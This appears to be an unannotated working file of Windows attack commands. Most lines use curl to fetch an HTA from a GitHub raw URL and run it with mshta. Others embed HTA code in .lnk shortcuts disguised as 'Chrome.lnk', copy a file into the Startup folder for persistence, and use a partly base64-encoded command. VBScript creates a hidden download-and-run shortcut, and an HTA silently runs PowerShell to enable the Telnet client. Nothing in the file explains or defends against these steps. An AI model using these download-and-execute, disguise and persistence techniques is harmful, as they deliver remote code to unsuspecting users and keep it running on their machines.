
final
===========
C:\Windows\System32\cmd.exe /C "curl -o "%USERPROFILE%\code1.hta" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta && mshta %USERPROFILE%\code1.hta"
===============

copy /b C:\Users\Sojib\Desktop\Blueprint.lnk+code.hta Chrome.lnk
C:\Windows\System32\cmd.exe /c mshta %CD%\Chrome.lnk
copy /b C:\Users\Sojib\Desktop\BlueprintOld.lnk+code.hta ChromeStep1.lnk

curl -o "%CD%\code1.hta" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta
C:\Windows\System32\cmd.exe /C "curl -o "%CD%\code1.hta" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta"
C:\Windows\System32\cmd.exe /C "curl -o "C:\code1.hta" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta && mshta C:\code1.hta"
C:\Windows\System32\cmd.exe /C "curl -o "%USERPROFILE%\code1.hta" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta && mshta %USERPROFILE%\code1.hta"
cmd /C "QzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlIFwvQyAiY3VybCAtbyAiJVx1MjAxUHJvcGFnZVxjb2RlLnR4dCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vSEFYT1JLODg4MC"
C:\Windows\System32\cmd.exe /C "mshta %USERPROFILE%\code1.hta"
copy /b C:\Users\Sojib\Music\Blueprint.lnk+%USERPROFILE%\code1.hta Chrome.lnk

copy "%1" "C:\Users\{YourUsername}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\cmd.exe /C 'mshta <script type="text/vbscript">
      MsgBox "Hello-- Sazzad", vbInformation + vbOKOnly, "Alert"
</script>'


<script type="text/vbscript">
      MsgBox "Hello-- Sazzad", vbInformation + vbOKOnly, "Alert"
</script>

Sub ExecutePSCommand
        Set objShell = CreateObject("WScript.Shell")
        ' PowerShell code to create a shortcut
        psCode = "New-Item -Path 'C:\path\to\your' -Name 'shortcut.lnk' -ItemType 'File'; " &_
                 " $Shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut('C:\path\to\your\shortcut.lnk');" &_
                 " $Shortcut.TargetPath = 'C:\Windows\System32\cmd.exe'; " &_
                 " $Shortcut.Arguments = '/C ""curl -o \"%USERPROFILE%\code1.hta\" https://raw.githubusercontent.com/HAXORK8880/files/main/code.hta && mshta %USERPROFILE%\code1.hta""'; " &_
                 " $Shortcut.Save()"

        ' Execute the PowerShell code
        objShell.Run "powershell.exe -Command " & psCode, 0, True
    End Sub


<!DOCTYPE html>
<html>
<head>
  <title>Hello Sazzad Alert with PowerShell Command</title>
  <hta:application
    id="helloSazzadApp"
    applicationname="Hello Sazzad Alert with PowerShell Command"
    border="thin"
    caption="yes"
    contextmenu="no"
    innerborder="no"
    maximizebutton="no"
    minimizebutton="no"
    navigable="no"
    scroll="no"
    selection="no"
    showintaskbar="yes"
    singleinstance="yes"
    sysmenu="yes"
    version="1.0"
    windowstate="normal"
  />
  <script type="text/vbscript">
    ExecutePSCommand
    Sub DisplayAlertAndExecutePSCommand
      MsgBox "Hello Sazzad", vbInformation + vbOKOnly, "Alert"
      
    End Sub

    Sub ExecutePSCommand
		Set objShell = CreateObject("WScript.Shell")
		objShell.Run "powershell.exe -Command New-Item -Path $env:USERPROFILE\Desktop -Name baltest -ItemType Directory; dism /online /Enable-Feature /FeatureName:TelnetClient", 0, True
	End Sub
  </script>
</head>
<body>
  <button onclick="DisplayAlertAndExecutePSCommand()">Click to Display Alert and Execute PowerShell Command</button>
</body>